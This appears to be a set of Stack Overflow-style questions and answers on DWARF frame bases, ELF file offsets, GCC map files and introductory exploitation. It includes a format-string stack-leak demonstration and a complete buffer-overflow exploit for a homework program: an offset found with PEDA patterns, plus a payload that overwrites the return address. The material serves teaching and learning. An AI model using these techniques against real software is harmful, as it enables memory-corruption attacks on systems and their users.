How to parse DW_OP_call_frame_cfa?

I am trying to get variable locations from C code (x86_64) using libdwarf, but GCC, even with optimizations off (-O0), expresses the frame base as DW_OP_call_frame_cfa. Clang, in contrast, uses DW_OP_reg6, which is rbp in the x86_64 ABI.
I have read the DWARF 4 standard, but I cannot figure out how to get the actual address relative to the stack pointer or base pointer. I also found a similar question, "What do I do with DW_OP_call_frame_cfa", but it did not help.
A simple program like:
int main()
{
    int va = 1;
    int vb = 2;
    va = va + vb;
    return (va);
}
will produce the following output in dwarfdump:
< 1><0x0000002d> DW_TAG_subprogram
DW_AT_external yes(1)
DW_AT_name main
DW_AT_decl_file 0x00000001 file.c
DW_AT_decl_line 0x00000001
DW_AT_type <0x00000069>
DW_AT_low_pc 0x00400620
DW_AT_high_pc <offset-from-lowpc>29
DW_AT_frame_base len 0x0001: 9c: DW_OP_call_frame_cfa
DW_AT_GNU_all_call_sites yes(1)
DW_AT_sibling <0x00000069>
< 2><0x0000004e> DW_TAG_variable
DW_AT_name va
DW_AT_decl_file 0x00000001 file.c
DW_AT_decl_line 0x00000003
DW_AT_type <0x00000069>
DW_AT_location len 0x0002: 916c: DW_OP_fbreg -20
< 2><0x0000005b> DW_TAG_variable
DW_AT_name vb
DW_AT_decl_file 0x00000001 file.c
DW_AT_decl_line 0x00000004
DW_AT_type <0x00000069>
DW_AT_location len 0x0002: 9168: DW_OP_fbreg -24
and the following information in readelf -wf file
00000070 000000000000001c 00000044 FDE cie=00000030 pc=0000000000400620..000000000040063d
DW_CFA_advance_loc: 1 to 0000000000400621
DW_CFA_def_cfa_offset: 16
DW_CFA_offset: r6 (rbp) at cfa-16
DW_CFA_advance_loc: 3 to 0000000000400624
DW_CFA_def_cfa_register: r6 (rbp)
DW_CFA_advance_loc: 24 to 000000000040063c
DW_CFA_def_cfa: r7 (rsp) ofs 8
DW_CFA_nop
DW_CFA_nop
DW_CFA_nop
From what I have read, I have to implement a minimal stack machine, but I do not even know how to parse this by hand.
Is there a way to force GCC to not use the DW_OP_call_frame_cfa and use a simple register instead, or do I really need to interpret the frame information? And if so, how?

I am not really familiar with DWARF or debug info formats in general, but to answer just the
Is there a way to force GCC to not use the DW_OP_call_frame_cfa
part: grepping for DW_OP_call_frame_cfa in the GCC sources, I found that the -gdwarf-2 switch makes GCC produce this instead:
DW_AT_frame_base <loclist at offset 0x00000000 with 4 entries follows>
[ 0]< offset pair low-off : 0x00000000 addr 0x00001119 high-off 0x00000001 addr 0x0000111a>DW_OP_breg7+8
[ 1]< offset pair low-off : 0x00000001 addr 0x0000111a high-off 0x00000004 addr 0x0000111d>DW_OP_breg7+16
[ 2]< offset pair low-off : 0x00000004 addr 0x0000111d high-off 0x0000001c addr 0x00001135>DW_OP_breg6+16
[ 3]< offset pair low-off : 0x0000001c addr 0x00001135 high-off 0x0000001d addr 0x00001136>DW_OP_breg7+8
Not sure whether switching to version 2 of DWARF suits you though.
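To connect this location list with the variables in the question, here is a minimal sketch of the arithmetic: look up the CFA rule for a given pc, then add the DW_OP_fbreg offset. The table is transcribed by hand from the FDE in the question; its first row assumes the usual x86-64 CIE rule (CFA = rsp + 8), which the question does not show. The names cfa_row, cfa_at and fbreg_address are made up for illustration and are not part of libdwarf.

```c
#include <stddef.h>
#include <stdint.h>

/* DWARF register numbers on x86-64, as printed by readelf (r6 = rbp, r7 = rsp). */
enum cfa_reg { REG_RBP = 6, REG_RSP = 7 };

/* One row of the CFA table: for pc in [lo, hi), CFA = register value + offset. */
struct cfa_row {
    uint64_t lo, hi;
    enum cfa_reg reg;
    int64_t offset;
};

/* Hand-transcribed from the FDE in the question. The first row is an
 * assumption: it comes from the CIE, which the question does not show. */
static const struct cfa_row main_cfa[] = {
    { 0x400620, 0x400621, REG_RSP,  8 },
    { 0x400621, 0x400624, REG_RSP, 16 },
    { 0x400624, 0x40063c, REG_RBP, 16 },
    { 0x40063c, 0x40063d, REG_RSP,  8 },
};

/* Returns the CFA for pc, or 0 if pc lies outside the function. */
uint64_t cfa_at(uint64_t pc, uint64_t rsp, uint64_t rbp)
{
    for (size_t i = 0; i < sizeof main_cfa / sizeof main_cfa[0]; i++) {
        const struct cfa_row *r = &main_cfa[i];
        if (pc >= r->lo && pc < r->hi)
            return (r->reg == REG_RBP ? rbp : rsp) + (uint64_t)r->offset;
    }
    return 0;
}

/* DW_AT_frame_base is DW_OP_call_frame_cfa, so DW_OP_fbreg N means CFA + N. */
uint64_t fbreg_address(uint64_t pc, uint64_t rsp, uint64_t rbp, int64_t fbreg)
{
    uint64_t cfa = cfa_at(pc, rsp, rbp);
    return cfa ? cfa + (uint64_t)fbreg : 0;
}
```

Under these assumptions, inside the body of main (after mov rbp,rsp) va at DW_OP_fbreg -20 resolves to rbp + 16 - 20 = rbp - 4, and vb at DW_OP_fbreg -24 to rbp - 8.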

Related

Where in object file does the code of function "main" starts?

I have an object file of a C program which prints hello world, just for the question.
I am trying to understand, using readelf, gdb or hexedit (I can't figure out which tool is the right one), where in the file the code of the function "main" starts.
From readelf I know that the symbols _start and main exist, and the addresses at which they are mapped in virtual memory. I also know the size of the .text section and, of course, where the entry point is specified, i.e. an address that is the same as that of the text section.
The question is: where in the file does the code of the function "main" start? I thought it would be the entry point and the offset of the text section, but as I understand it the data, bss and rodata sections should be run before main, and they appear after the text section in readelf.
I also thought we should sum the sizes of all the entries before main in the symbol table, but I am not sure at all that this is correct.
A follow-up question: if I want to replace the main function with NOP instructions, or plant a single ret instruction in my object file, how can I find the offset at which to do it using hexedit?
So, let's go through it step by step.
Start with this C file:
#include <stdio.h>
void printit()
{
    puts("Hello world!");
}
int main(void)
{
    printit();
    return 0;
}
Since the comments suggest you are on x86, compile it as a 32-bit non-PIE executable like this:
$ gcc -m32 -no-pie -o test test.c
The -m32 option is needed because I am working on an x86-64 machine. As you already know, you can get the virtual memory address of main using readelf, objdump or nm, for example like this:
$ nm test | grep -w main
0804918d T main
Obviously, 804918d can not be an offset in the file that is just 15 kB big. You need to find the mapping between virtual memory addresses and file offsets. In a typical ELF file, the mapping is included twice. Once in a detailed form for linkers (as object files are also ELF files) and debuggers, and a second time in a condensed form that is used by the kernel for loading programs. The detailed form is the list of sections, consisting of section headers, and you can view it like this (the output is shortened a bit, to make the answer more readable):
$ readelf --section-headers test
There are 29 section headers, starting at offset 0x3748:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[...]
[11] .init PROGBITS 08049000 001000 000020 00 AX 0 0 4
[12] .plt PROGBITS 08049020 001020 000030 04 AX 0 0 16
[13] .text PROGBITS 08049050 001050 0001c1 00 AX 0 0 16
[14] .fini PROGBITS 08049214 001214 000014 00 AX 0 0 4
[15] .rodata PROGBITS 0804a000 002000 000015 00 A 0 0 4
[...]
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
L (link order), O (extra OS processing required), G (group), T (TLS),
C (compressed), x (unknown), o (OS specific), E (exclude),
p (processor specific)
Here you find that the .text section starts at (virtual) address 08049050 and has a size of 1c1 bytes, so it ends at address 08049211. The address of main, 804918d is in this range, so you know main is a member of the text section. If you subtract the base of the text section from the address of main, you find that main is 13d bytes into the text section. The section listing also contains the file offset where the data for the text section starts. It's 1050, so the first byte of main is at offset 0x1050 + 0x13d == 0x118d.
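The subtraction and addition above can be written as a small helper. This is only a sketch of the arithmetic; the function name section_vaddr_to_offset is made up, and the values are meant to be copied by hand from the readelf output.

```c
#include <stdint.h>

/* Returns the file offset of vaddr if it lies inside the section described by
 * (sec_addr, sec_off, sec_size), or -1 if the address is outside the section. */
int64_t section_vaddr_to_offset(uint32_t vaddr, uint32_t sec_addr,
                                uint32_t sec_off, uint32_t sec_size)
{
    if (vaddr < sec_addr || vaddr - sec_addr >= sec_size)
        return -1;
    /* distance into the section, added to where the section starts in the file */
    return (int64_t)sec_off + (vaddr - sec_addr);
}
```

With the numbers from this answer, section_vaddr_to_offset(0x0804918d, 0x08049050, 0x1050, 0x1c1) gives 0x118d.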
You can do the same calculation using program headers:
$ readelf --program-headers test
[...]
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x00160 0x00160 R 0x4
INTERP 0x000194 0x08048194 0x08048194 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x002e8 0x002e8 R 0x1000
LOAD 0x001000 0x08049000 0x08049000 0x00228 0x00228 R E 0x1000
LOAD 0x002000 0x0804a000 0x0804a000 0x0019c 0x0019c R 0x1000
LOAD 0x002f0c 0x0804bf0c 0x0804bf0c 0x00110 0x00114 RW 0x1000
[...]
The second load line tells you that the area 08049000 (VirtAddr) to 08049228 (VirtAddr + MemSiz) is readable and executable, and loaded from offset 1000 in the file. So again you can calculate that the address of main is 18d bytes into this load area, so it has to reside at offset 0x118d inside the executable. Let's test that:
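The same lookup can be sketched over the LOAD segments. The table below copies the Offset, VirtAddr and FileSiz columns from the readelf output above; the struct and function names are made up for illustration. Only FileSiz bytes of a segment are backed by the file, so an address in the MemSiz-only tail has no file offset.

```c
#include <stddef.h>
#include <stdint.h>

struct load_segment {
    uint32_t offset;   /* Offset column   */
    uint32_t vaddr;    /* VirtAddr column */
    uint32_t filesz;   /* FileSiz column  */
};

/* The four LOAD lines from the readelf --program-headers output. */
static const struct load_segment segments[] = {
    { 0x000000, 0x08048000, 0x002e8 },
    { 0x001000, 0x08049000, 0x00228 },
    { 0x002000, 0x0804a000, 0x0019c },
    { 0x002f0c, 0x0804bf0c, 0x00110 },
};

/* Returns the file offset backing vaddr, or -1 if no LOAD segment
 * contains it within its file-backed part. */
int64_t segment_vaddr_to_offset(uint32_t vaddr)
{
    for (size_t i = 0; i < sizeof segments / sizeof segments[0]; i++) {
        const struct load_segment *s = &segments[i];
        if (vaddr >= s->vaddr && vaddr - s->vaddr < s->filesz)
            return (int64_t)s->offset + (vaddr - s->vaddr);
    }
    return -1;
}
```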
$ ./test
Hello world!
$ echo -ne '\xc3' | dd of=test conv=notrunc bs=1 count=1 seek=$((0x118d))
1+0 records in
1+0 records out
1 byte copied, 0.0116672 s, 0.1 kB/s
$ ./test
$
Overwriting the first byte of main with 0xc3, the opcode for return (near) on x86, causes the program to not output anything anymore.
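If you would rather do the patch from C than with dd, a minimal sketch using only standard I/O could look like this. The function name patch_byte is made up; the offset and value are whatever you computed above.

```c
#include <stdio.h>

/* Overwrites a single byte at `offset` in the file at `path`.
 * Returns 0 on success and -1 on any I/O error. */
int patch_byte(const char *path, long offset, unsigned char value)
{
    /* "r+b" opens for update without truncating, like dd's conv=notrunc */
    FILE *f = fopen(path, "r+b");
    if (f == NULL)
        return -1;

    int ok = fseek(f, offset, SEEK_SET) == 0 && fputc(value, f) != EOF;

    /* fclose flushes the write, so its result matters too */
    if (fclose(f) != 0)
        ok = 0;
    return ok ? 0 : -1;
}
```

For the example in this answer the call would be patch_byte("test", 0x118d, 0xc3).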
_start normally belongs to a fixed module (a *.o file). Its name differs between systems, but a common one is crt0.o, which is written in assembler. The execve(2) system call normally stores the arguments and the environment in the initial stack segment; the job of crt0.o is to prepare the initial C stack frame and call main(). Once main() returns, this code takes the return value from main, calls all the atexit() handlers, and finishes by calling the _exit(2) system call.
The linking of crt0.o is normally transparent, because you usually let the compiler do the linking. You therefore don't have to add crt0.o as the first object module yourself; the compiler knows to do it. (Lately all this has grown considerably, since it depends on the architecture and on the ABI used to pass parameters between functions.)
If you execute the compiler with the -v option, you'll get the exact command line it uses to call the linker and you'll get the secrets of the final memory map your program has on its first stages.

Difficulties Understanding Format String Exploitation

I am reading a book, Hacking: The Art of Exploitation 2nd Edition, and I'm at the chapter of format string vulnerability. I read the chapter multiple times but I'm unable to clearly understand it, even with some googling.
So, in the book there is this vulnerable code:
char text[1024];
...
strcpy(text, argv[1]);
printf("The right way to print user-controlled input:\n");
printf("%s", text);
printf("\nThe wrong way to print user-controlled input:\n");
printf(text);
Then after compiling,
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "%08x."x40')
The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
%08x.%08x.
The wrong way to print user-controlled input:
bffff320.b7fe75fc.00000000.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252
e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.2
52e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e78
38.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
The bytes 0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot.
reader@hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n"
%08x.
First, why is that value repeating itself?
As you can see, they’re the memory for the format string itself. Because
the format function will always be on the highest stack frame, as long as the
format string has been stored anywhere on the stack, it will be located below
the current frame pointer (at a higher memory address).
But it seems to me this contradicts what he previously wrote and the way stack frames are organized
When this printf() function is called (as with any function), the arguments are pushed to the stack in reverse order.
So, shouldn't the format string be at a lower memory address since it is the first argument? And where is the format string stored?
reader@hacking:~/booksrc $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x
The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAAbffff3d0.b7fe75fc.00000000.41414141
Here again, why is AAAA repeated in 41414141. From what I understand, the printf function prints AAAA first, then when it sees the first %08x, it gets a value from a memory address in the preceding stack frame, then does the same with the second %08x, thus the value of the second is located in a memory address higher than the first one, and finally returns to the value of AAAA located in a lower memory address, in the stack frame of printf function.
I debugged the first example with $(perl -e 'print "%08x."x40') as argument. I run: Linux 5.3.0-40-generic, 18.04.1-Ubuntu, x86_64
(gdb) run $(perl -e 'print "%08x." x 40')
Starting program: /home/kuro/fmt_vuln $(perl -e 'print "%08x." x 40')
The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way to print user-controlled input:
07a51260.4b3eb8c0.4b10e154.00000000.4b16c3a0.9d357fc8.9d357b10.78383025.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838.4b618d00.4b5fd000.00000000.9d357c80.00000000.00000000.00000000.4b3ef6f0.
Breakpoint 1, main (argc=2, argv=0x7ffd9d357fc8) at fmt_vuln.c:19
19 printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);
(gdb) x/-100xw $rsp
0x7ffd9d357940: 0x00000400 0x00000000 0x4b07c1aa 0x00007fb8
0x7ffd9d357950: 0x00000016 0x00000000 0x00000003 0x00000000
0x7ffd9d357960: 0x00000001 0x00000000 0x00002190 0x000003e8
0x7ffd9d357970: 0x00000005 0x00000000 0x00008800 0x00000000
0x7ffd9d357980: 0x00000000 0x00000000 0x00000400 0x00000000
0x7ffd9d357990: 0x00000000 0x00000000 0x5e970730 0x00000000
0x7ffd9d3579a0: 0x65336234 0x30663666 0x90890300 0x79e57be9
0x7ffd9d3579b0: 0x1cd79dbf 0x00000000 0x00000000 0x00000000
0x7ffd9d3579c0: 0x05cec660 0x000055ef 0x9d357fc0 0x00007ffd
0x7ffd9d3579d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7ffd9d3579e0: 0x9d357ee0 0x00007ffd 0x4b062f26 0x00007fb8
0x7ffd9d3579f0: 0x00000030 0x00000030 0x9d357be8 0x00007ffd
0x7ffd9d357a00: 0x9d357a10 0x00007ffd 0x90890300 0x79e57be9
0x7ffd9d357a10: 0x4b3ea760 0x00007fb8 0x07a51260 0x000055ef
0x7ffd9d357a20: 0x4b3eb8c0 0x00007fb8 0x4b0891bd 0x00007fb8
0x7ffd9d357a30: 0x00000000 0x00000000 0x4b3ea760 0x00007fb8
0x7ffd9d357a40: 0x00000d68 0x00000000 0x00000169 0x00000000
0x7ffd9d357a50: 0x07a51260 0x000055ef 0x4b08af51 0x00007fb8
0x7ffd9d357a60: 0x4b3e62a0 0x00007fb8 0x4b3ea760 0x00007fb8
0x7ffd9d357a70: 0x0000000a 0x00000000 0x05cec660 0x000055ef
0x7ffd9d357a80: 0x9d357fc0 0x00007ffd 0x00000000 0x00000000
0x7ffd9d357a90: 0x00000000 0x00000000 0x4b08b403 0x00007fb8
0x7ffd9d357aa0: 0x4b3ea760 0x00007fb8 0x9d357ee0 0x00007ffd
0x7ffd9d357ab0: 0x05cec660 0x000055ef 0x4b0808f5 0x00007fb8
0x7ffd9d357ac0: 0x00000000 0x00000000 0x05cec824 0x000055ef
(gdb) x/100xw $rsp
0x7ffd9d357ad0: 0x9d357fc8 0x00007ffd 0x9d357b10 0x00000002
0x7ffd9d357ae0: 0x78383025 0x3830252e 0x30252e78 0x252e7838
0x7ffd9d357af0: 0x2e783830 0x78383025 0x3830252e 0x30252e78
0x7ffd9d357b00: 0x252e7838 0x2e783830 0x78383025 0x3830252e
0x7ffd9d357b10: 0x30252e78 0x252e7838 0x2e783830 0x78383025
0x7ffd9d357b20: 0x3830252e 0x30252e78 0x252e7838 0x2e783830
0x7ffd9d357b30: 0x78383025 0x3830252e 0x30252e78 0x252e7838
0x7ffd9d357b40: 0x2e783830 0x78383025 0x3830252e 0x30252e78
0x7ffd9d357b50: 0x252e7838 0x2e783830 0x78383025 0x3830252e
0x7ffd9d357b60: 0x30252e78 0x252e7838 0x2e783830 0x78383025
0x7ffd9d357b70: 0x3830252e 0x30252e78 0x252e7838 0x2e783830
0x7ffd9d357b80: 0x78383025 0x3830252e 0x30252e78 0x252e7838
0x7ffd9d357b90: 0x2e783830 0x78383025 0x3830252e 0x30252e78
0x7ffd9d357ba0: 0x252e7838 0x2e783830 0x4b618d00 0x00007fb8
0x7ffd9d357bb0: 0x4b5fd000 0x00007fb8 0x00000000 0x00000000
0x7ffd9d357bc0: 0x9d357c80 0x00007ffd 0x00000000 0x00000000
0x7ffd9d357bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7ffd9d357be0: 0x4b3ef6f0 0x00007fb8 0x4b6184c8 0x00007fb8
0x7ffd9d357bf0: 0x9d357c80 0x00007ffd 0x4b3ef000 0x00007fb8
0x7ffd9d357c00: 0x4b3ef914 0x00007fb8 0x4b3ef3c0 0x00007fb8
0x7ffd9d357c10: 0x4b617048 0x00007fb8 0x00000000 0x00000000
0x7ffd9d357c20: 0x00000000 0x00000000 0x4b6179f0 0x00007fb8
0x7ffd9d357c30: 0x4b0030e8 0x00007fb8 0x00000000 0x00000000
0x7ffd9d357c40: 0x4b3efa00 0x00007fb8 0x00000480 0x00000000
0x7ffd9d357c50: 0x00000027 0x00000000 0x00000000 0x00000000
The values that appear before the "%08x." values in the "wrong way" output sit at lower addresses than the "%08x." values. Why? The format string is supposed to be at the top of the stack.
The values that appear after the "%08x." values in the "wrong way" output sit at higher addresses than the "%08x." values, so in the preceding stack frame.
Why is it like this? Shouldn't the output begin with the format string values, or after them?
Also, in the book, nothing is printed after the "%08x." values, but some values are printed in my case. And some values in the output don't even appear on the stack, like 4b16c3a0.
I have to recommend against what you're doing. You're focussing on security vulnerabilities in C without a strong understanding of the language itself. That's an exercise in frustration. As evidence, I offer that every question you're posing about the exercise is answered by understanding printf(3), not stack vulnerabilities.
The output of your perl line (the contents of argv[1]) starts with %08x.%08x.%08x.%08x.%08x. That's a format string. Each %08x is looking for a further printf argument, an integer to print in hex representation. Normally, you might do something like,
int a = 'B';
printf( "%02x\n", a );
which produces 42 much faster than the computer in the Hitchhiker's Guide to the Galaxy.
What you've done is pass a long format string with zero arguments. printf(3) can't know how many arguments it was passed; it has to infer them from the format string. Your format string tells printf to print a long list of integers. Since none were provided, it looks for them "up the stack" (wherever they should have been). What gets printed looks like nonsense because the contents of those memory locations are unpredictable, or at any rate were not defined by you.
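The repeating values in the question's output are not arbitrary, though: as the book passage quoted there says, they are the bytes of the format string itself, read back four at a time as little-endian integers. A small sketch of that reading (le_word_at is a made-up helper name; the caller must make sure the string is long enough):

```c
#include <stddef.h>
#include <stdint.h>

/* Reads the 4 bytes at s + 4*index as one little-endian 32-bit word, which is
 * how x86 printf sees them when %08x fetches an unsigned int from memory.
 * The caller guarantees that s holds at least 4*(index+1) bytes. */
uint32_t le_word_at(const char *s, size_t index)
{
    const unsigned char *p = (const unsigned char *)s + 4 * index;
    return (uint32_t)p[0]
         | (uint32_t)p[1] << 8
         | (uint32_t)p[2] << 16
         | (uint32_t)p[3] << 24;
}
```

Applied to "%08x.%08x.%08x.%08x.", the words at index 0 to 4 are 78383025, 3830252e, 30252e78, 252e7838 and 2e783830, the same sequence as in the book's 32-bit output. In the 64-bit gdb session the sequence looks shuffled (78383025, 30252e78, 2e783830, ...), which is consistent with each variadic stack slot being 8 bytes wide there, so that %08x shows only the low half of every slot, i.e. every other word.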
In the "good" case, the format string is "%s", declaring one argument of type string, which you provided. That works much better, yes.
Most compilers nowadays take special care with printf. They can produce warnings if the format string isn't a compile-time constant, and they can verify that each argument is of the correct type for its corresponding format specifier. The whole chapter in your book can thus be made moot simply by using the compiler's capabilities and paying attention to its diagnostics.
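As a small illustration of the "right way", here is a sketch that formats user-controlled text through a constant "%s" format, so that any % in the input is copied literally instead of being interpreted. The function name format_user_text is made up for this example.

```c
#include <stdio.h>

/* Copies user-controlled text into `out`, treating it purely as data.
 * The format string is the literal "%s", so conversion specifiers inside
 * user_text are never interpreted. Returns what snprintf returns: the
 * length the full text would have needed, excluding the terminating NUL. */
int format_user_text(char *out, size_t out_size, const char *user_text)
{
    return snprintf(out, out_size, "%s", user_text);
}
```

With GCC, the options -Wformat -Wformat-security warn about calls such as printf(text), where the format is not a string literal and there are no further arguments.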

How can I exploit a buffer overflow?

I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
    printf("Gotcha!\n");
    exit(0);
}
int goodFunctionUserInput(void)
{
    char buf[12];
    gets(buf);
    return(1);
}
int main(void)
{
    goodFunctionUserInput();
    printf("Overflow failed\n");
    return(1);
}
The professor wants us to exploit the input to gets(). We are not supposed to modify the code in any way, only create a malicious input that causes a buffer overflow. I've looked online, but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp with rsp because I am on a 64-bit system, but that gave the same result. Is there a workaround for this, or another way to find the address of buf?
Since buf is an array of 12 characters, entering anything longer than 12 characters should result in a buffer overflow.
First, you need to find the offset at which the saved return address, and with it the instruction pointer (RIP in the 64-bit session below, EIP in a 32-bit build), gets overwritten.
Using gdb with PEDA is very helpful for this:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now you can overwrite the instruction pointer: the offset is 24 bytes. Since your homework only needs to print the "Gotcha!\n" string, just jump to the oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Build the exploit input and check the result:
[manu@debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu@debian /tmp]$ ./bof < input
Gotcha!
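The python one-liner above uses Python 2 print syntax. The same bytes can be produced in C; the sketch below only restates the layout found with PEDA (24 filler bytes, then the 8-byte address in little-endian order). The function name build_payload is made up, and both the offset 24 and the address 0x400596 are specific to the binary in this answer.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fills `out` with `pad` filler bytes ('A') followed by `addr` as 8
 * little-endian bytes. Returns the payload length, or 0 if `out` is
 * too small to hold it. */
size_t build_payload(unsigned char *out, size_t out_size, size_t pad, uint64_t addr)
{
    if (out_size < pad + 8)
        return 0;
    memset(out, 'A', pad);
    for (int i = 0; i < 8; i++)
        out[pad + i] = (unsigned char)(addr >> (8 * i));  /* lowest byte first */
    return pad + 8;
}
```

Writing the returned number of bytes with fwrite, followed by a newline, should give the same input file as the one-liner.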

Understanding GCC generated map files

I'm trying to write a script that parses .map files generated by GCC and help me figure out what the footprints of various libraries are in memory. (Github repository of what I have so far)
I'm trying to understand what the following means / how it should be read :
.debug_line 0x00000000 0x67b1
*(.debug_line .debug_line.* .debug_line_end)
.debug_line 0x00000000 0x105 /opt/ti/gcc/bin/../lib/gcc/msp430-elf/4.9.1/../../../../msp430-elf/lib/crt0.o
.debug_line 0x00000105 0x4b5 CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
.debug_line.text.bc_printf.constprop.1
0x000005ba 0x23 CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
.debug_line.text.deferred_exec
0x000005dd 0x60 CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
.debug_line.text.startup.main
0x0000063d 0xfc CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
.debug_line_end
0x00000739 0x0 CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
I've been assuming that the first line, which is not indented, is some sort of section heading, and that its address (0x00000000) somehow relates to where the contents of the section should be written. An address of 0x00000000 somehow results in the contents being discarded.
The indented lines (those which start with .debug_line) also have an address. When the symbol is going to be written to the binary, these addresses are absolute.
.text 0x000048d8 0x3312
0x000048d8 . = ALIGN (0x2)
*(.lower.text.* .lower.text)
0x000048d8 . = ALIGN (0x2)
*(.text .stub .text.* .gnu.linkonce.t.* .text:*)
.text 0x000048d8 0xa4 /opt/ti/gcc/bin/../lib/gcc/msp430-elf/4.9.1/crtbegin.o
.text.bc_printf.constprop.1
0x0000497c 0x1a CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
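For the parsing script itself, the single-line entries in these excerpts have the shape "section address size object-file". A rough sketch of reading one such line in C follows; it is based only on the excerpts shown here, not on any documented map-file grammar, and the names map_entry and parse_map_line are made up. Entries whose section name is too long wrap onto a second line (as .debug_line.text.deferred_exec does above) and are not handled.

```c
#include <stdio.h>

struct map_entry {
    char section[64];       /* e.g. ".debug_line"  */
    unsigned long address;  /* second column, hex  */
    unsigned long size;     /* third column, hex   */
    char object[256];       /* contributing object */
};

/* Parses one single-line entry of the form
 *     <section> <address> <size> <object file>
 * Returns 1 on success and 0 if the line does not have all four fields
 * (section headings, "*(...)" patterns, wrapped entries and so on). */
int parse_map_line(const char *line, struct map_entry *e)
{
    /* %lx accepts an optional 0x prefix; field widths guard the buffers */
    return sscanf(line, " %63s %lx %lx %255s",
                  e->section, &e->address, &e->size, e->object) == 4;
}
```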
How does the address in the section heading, or whatever the first line should be called, translate to the address in the actual symbols and so forth? i.e., How would 0x00000000 result in the symbols being discarded (even though the addresses they contain may indeed be valid writeable locations otherwise)
What does the indented line beginning with a *, i.e. *(.debug_line .debug_line.* .debug_line_end) mean? I'm fairly certain this line is critical to defining the treatment of the second last line in the first snippet, since .debug_line_end isn't defined all by itself in a way similar to how .debug_line is in the first line of the snippet. I can't seem to find any references to the structure of the file, though.
With those answers, I'd like to be able to understand how .eh_frame in the following snippet is resolved. I can post the full map file if it's necessary, but I suspect all the information needed is somehow encoded within the snippet, and at that within the top and bottom few lines only.
